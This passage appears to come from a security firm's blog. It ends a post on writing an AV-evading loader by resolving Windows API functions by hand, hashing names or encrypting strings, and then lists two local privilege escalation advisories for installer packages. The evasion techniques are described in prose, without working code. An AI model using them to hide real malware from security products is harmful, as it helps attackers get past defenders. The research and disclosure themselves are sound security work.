VirtualProtect
VirtualQuery
    VirtualAddress
VirtualSize
VirtualAddress
VirtualSize
VirtualProtect
VirtualQuery
VirtualAddress
VirtualQuery
VirtualProtect
__imp_VirtualProtect
__imp_VirtualQuery

As can be seen, the VirtualAlloc function name is still visible here, and a security product could easily recognize what we are up to. As mentioned before, one way to get around this is to use hashes instead of the function name to find the function we want to resolve. However, these hashes themselves might be an indicator of malicious intent if they are frequently used by malware. Therefore, it would be advantageous to use a less common hash algorithm here.

Another option is to encrypt the strings and decrypt them during runtime. This is the route we went in our loader.

Summary

In this blog post, we discussed imports and how AV solutions use them for static analysis. We then went over the structures and fields we need to look at to resolve a module manually, similar to GetModuleHandle(). Subsequently, we looked at resolving a function from a function name and a pointer to the module in memory, as done by GetProcAddress(). Finally, we briefly mentioned the need for obfuscating the function names that we want to resolve. The structures seen in this post will be relevant again in the following posts.

Further blog articles

Do you want to protect your systems? Feel free to get in touch with us.

Vulnerability in neo42 Sumatra PDF Package

Sumatra PDF is an open-source PDF reader. The vulnerability was found in the installer for this product shipped by neo42 for Matrix 42 Unified Endpoint Management.

Local Privilege Escalation Vulnerability in neo42 Sumatra PDF Package

The installer package used a folder that was writeable by unprivileged users to store executables. An attacker with access to the system could have manipulated these executables to gain SYSTEM privileges.

The vulnerability was acknowledged and fixed by neo42 within 4 weeks. We want to thank neo42 for their exemplary reaction to the vulnerability report.

CVSS Score
7.8 (CVSS v3)

CVSS Vector String
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Affected Version
neo42 Sumatra PDF Package Version 3.4.6.0

Mitigation
The vulnerability can be resolved by using the newest version of the installer provided by neo42.

Credits
Kolja Grassmann (cirosec GmbH)

Timeline

Vulnerability in Bytello Share

Bytello Share is a software used to share the screen of a device. The vulnerability was found in the installation process of the software.

Local privilege escalation vulnerability in Bytello Share Installer

The installer uses a folder that is writeable by unprivileged users to store executables and DLLs. An attacker with access to the system can manipulate the files during the installation process to gain SYSTEM privileges.

Note that the installer needs administrative rights to run. However, we were able to exploit this in a scenario where all users were able to request the installation of the software using a web interface provided by the software deployment solution. In this case, the user can trigger the execution of the installer with elevated rights and then exploit the installation process to gain SYSTEM privileges.

The vulnerability was not acknowledged by the manufacturer and it is therefore unlikely that it will be fixed. Please refer to the Mitigation section on how to protect your environment.

CVSS Score
6.7 (CVSS v3)

Affected Version
Bytello Share 5.6.0.2497

Mitigation
We recommend refraining from using the Bytello Share Installer in scenarios where an unprivileged user can trigger the installation (e.g. using a Software Kiosk).

Credits
Kolja Grassmann (cirosec GmbH)

Timeline
